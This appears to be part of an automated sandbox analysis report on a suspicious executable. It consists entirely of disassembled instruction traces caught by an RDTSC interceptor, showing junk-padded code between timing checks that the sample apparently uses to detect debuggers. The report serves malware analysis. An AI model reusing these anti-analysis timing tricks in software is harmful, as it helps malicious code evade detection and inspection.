                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F0197 second address: 53F0216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0550733D17h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F0550733D12h 0x00000013 and esp, FFFFFFF8h 0x00000016 pushad 0x00000017 movzx esi, dx 0x0000001a pushfd 0x0000001b jmp 00007F0550733D13h 0x00000020 sub ax, 535Eh 0x00000025 jmp 00007F0550733D19h 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, ecx 0x0000002d pushad 0x0000002e mov bx, ax 0x00000031 movzx esi, dx 0x00000034 popad 0x00000035 push eax 0x00000036 pushad 0x00000037 mov bx, ax 0x0000003a push eax 0x0000003b push edx 0x0000003c mov dh, ch 0x0000003e rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F0216 second address: 53F026C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ecx 0x00000008 jmp 00007F0550D663D1h 0x0000000d xchg eax, ebx 0x0000000e jmp 00007F0550D663CEh 0x00000013 push eax 0x00000014 jmp 00007F0550D663CBh 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b jmp 00007F0550D663D4h 0x00000020 mov dx, si 0x00000023 popad 0x00000024 mov ebx, dword ptr [ebp+10h] 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a mov dl, ah 0x0000002c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F026C second address: 53F02D1 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 0BDFAE78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, ebx 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f mov dword ptr [esp], esi 0x00000012 pushad 0x00000013 mov dx, ax 0x00000016 mov bx, cx 0x00000019 popad 0x0000001a mov esi, dword ptr [ebp+08h] 0x0000001d jmp 00007F0550733D12h 0x00000022 xchg eax, edi 0x00000023 pushad 0x00000024 push esi 0x00000025 pushad 0x00000026 popad 0x00000027 pop edi 0x00000028 mov ch, 1Eh 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007F0550733D12h 0x00000031 xchg eax, edi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F0550733D17h 0x00000039 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F02D1 second address: 53F030C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx edx, ax 0x00000011 call 00007F0550D663D4h 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F030C second address: 53F036F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 3996B5EDh 0x00000008 pushfd 0x00000009 jmp 00007F0550733D0Ah 0x0000000e sub ax, C188h 0x00000013 jmp 00007F0550733D0Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007F05C24E1FE8h 0x00000022 jmp 00007F0550733D16h 0x00000027 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F0550733D17h 0x00000035 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F036F second address: 53F0375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F0375 second address: 53F0379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F0379 second address: 53F03FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F05C2B14670h 0x0000000e pushad 0x0000000f mov eax, ebx 0x00000011 pushfd 0x00000012 jmp 00007F0550D663D9h 0x00000017 and al, 00000066h 0x0000001a jmp 00007F0550D663D1h 0x0000001f popfd 0x00000020 popad 0x00000021 mov edx, dword ptr [esi+44h] 0x00000024 jmp 00007F0550D663CEh 0x00000029 or edx, dword ptr [ebp+0Ch] 0x0000002c pushad 0x0000002d jmp 00007F0550D663CEh 0x00000032 movzx esi, di 0x00000035 popad 0x00000036 test edx, 61000000h 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F0550D663CFh 0x00000045 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F03FA second address: 53F0417 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F0417 second address: 53F041D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F041D second address: 53F0450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F05C24E1F58h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0550733D10h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F0450 second address: 53F045F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F045F second address: 53F0485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F0485 second address: 53F0489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F0489 second address: 53F04D6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0550733D18h 0x00000008 xor esi, 61996A18h 0x0000000e jmp 00007F0550733D0Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov cx, 3DCFh 0x0000001a popad 0x0000001b jne 00007F05C24E1EEAh 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F0550733D11h 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410B3F second address: 5410B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410B45 second address: 5410B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410B49 second address: 5410B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410B4D second address: 5410B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0550733D16h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410B73 second address: 5410B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410B79 second address: 5410B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410B7F second address: 5410B83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410B83 second address: 5410BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F0550733D0Ah 0x0000000f and esp, FFFFFFF8h 0x00000012 pushad 0x00000013 mov bx, cx 0x00000016 mov dx, si 0x00000019 popad 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0550733D0Eh 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410BB5 second address: 5410BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410BB9 second address: 5410BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410BBF second address: 5410C16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 22F2B943h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ecx, edx 0x0000000f pushfd 0x00000010 jmp 00007F0550D663D7h 0x00000015 sub cx, CD9Eh 0x0000001a jmp 00007F0550D663D9h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F0550D663CDh 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410C16 second address: 5410C41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F0550733D0Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410C41 second address: 5410C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410C45 second address: 5410C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410C49 second address: 5410C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410C4F second address: 5410C63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 4928h 0x00000007 movsx edx, ax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410C63 second address: 5410C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410C67 second address: 5410C6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410C6B second address: 5410C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410C71 second address: 5410CE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, B5h 0x00000005 pushfd 0x00000006 jmp 00007F0550733D0Fh 0x0000000b and al, 0000001Eh 0x0000000e jmp 00007F0550733D19h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a pushad 0x0000001b push eax 0x0000001c call 00007F0550733D13h 0x00000021 pop esi 0x00000022 pop edi 0x00000023 mov cx, 2165h 0x00000027 popad 0x00000028 sub ebx, ebx 0x0000002a jmp 00007F0550733D11h 0x0000002f test esi, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410CE0 second address: 5410CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0550D663D0h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410CF4 second address: 5410D43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F05C24B938Fh 0x00000011 jmp 00007F0550733D16h 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d jmp 00007F0550733D10h 0x00000022 mov ecx, esi 0x00000024 pushad 0x00000025 mov si, 5ABDh 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410D43 second address: 5410D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410D47 second address: 5410DDC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0550733D16h 0x00000008 xor al, FFFFFFC8h 0x0000000b jmp 00007F0550733D0Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 je 00007F05C24B9337h 0x0000001a jmp 00007F0550733D16h 0x0000001f test byte ptr [77226968h], 00000002h 0x00000026 pushad 0x00000027 mov si, 8C7Dh 0x0000002b pushfd 0x0000002c jmp 00007F0550733D0Ah 0x00000031 sbb cx, DF58h 0x00000036 jmp 00007F0550733D0Bh 0x0000003b popfd 0x0000003c popad 0x0000003d jne 00007F05C24B9305h 0x00000043 jmp 00007F0550733D16h 0x00000048 mov edx, dword ptr [ebp+0Ch] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410DDC second address: 5410DE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410DE2 second address: 5410E01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410E01 second address: 5410E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410E05 second address: 5410E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410E09 second address: 5410E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410E0F second address: 5410E15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410E15 second address: 5410E4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, 2912D4D5h 0x00000011 pushfd 0x00000012 jmp 00007F0550D663D2h 0x00000017 add ax, 05A8h 0x0000001c jmp 00007F0550D663CBh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410E4B second address: 5410E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0550733D14h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410E63 second address: 5410E8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F0550D663D7h 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410E8A second address: 5410E90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410E90 second address: 5410E96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410E96 second address: 5410E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410095 second address: 54100B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, 56BC8F20h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54100B2 second address: 54100B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54100B7 second address: 54100EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F0550D663D3h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0550D663D5h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54707AF second address: 54707B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54707B3 second address: 54707B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54707B7 second address: 54707BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54707BD second address: 54707EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0550D663D0h 0x00000008 mov dl, cl 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0550D663D4h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54707EE second address: 54707FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5470571 second address: 5470580 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5470580 second address: 5470586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5470586 second address: 547058A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54106EF second address: 54106F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54106F5 second address: 54106F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54106F9 second address: 541074D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F0550733D14h 0x00000010 or ax, 7AC8h 0x00000015 jmp 00007F0550733D0Bh 0x0000001a popfd 0x0000001b jmp 00007F0550733D18h 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 mov esi, 2BBC297Dh 0x00000028 push eax 0x00000029 push edx 0x0000002a mov edx, esi 0x0000002c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5470A22 second address: 5470A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5470A26 second address: 5470A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5470A2C second address: 5470A7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c jmp 00007F0550D663D0h 0x00000011 call 00007F0550D663C9h 0x00000016 pushad 0x00000017 mov bx, cx 0x0000001a mov ecx, 04B8E069h 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F0550D663CFh 0x00000026 mov eax, dword ptr [esp+04h] 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d mov bx, 4B38h 0x00000031 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5470A7F second address: 5470A9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F0550733D17h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5470A9E second address: 5470B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F0550D663D4h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F0550D663D1h 0x00000018 add ecx, 7E24B336h 0x0000001e jmp 00007F0550D663D1h 0x00000023 popfd 0x00000024 mov bh, ch 0x00000026 popad 0x00000027 pop eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F0550D663D6h 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5470B59 second address: 5470B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5470B5D second address: 5470B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5470B61 second address: 5470B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5470B67 second address: 5470BCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0550D663D2h 0x00000008 pop eax 0x00000009 jmp 00007F0550D663CBh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov edx, 765D2A16h 0x0000001a pushfd 0x0000001b jmp 00007F0550D663D7h 0x00000020 or esi, 704F269Eh 0x00000026 jmp 00007F0550D663D9h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6507C second address: C65086 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0550733D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 545002C second address: 5450044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0550D663D4h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450044 second address: 5450058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ebx, 00953D0Eh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
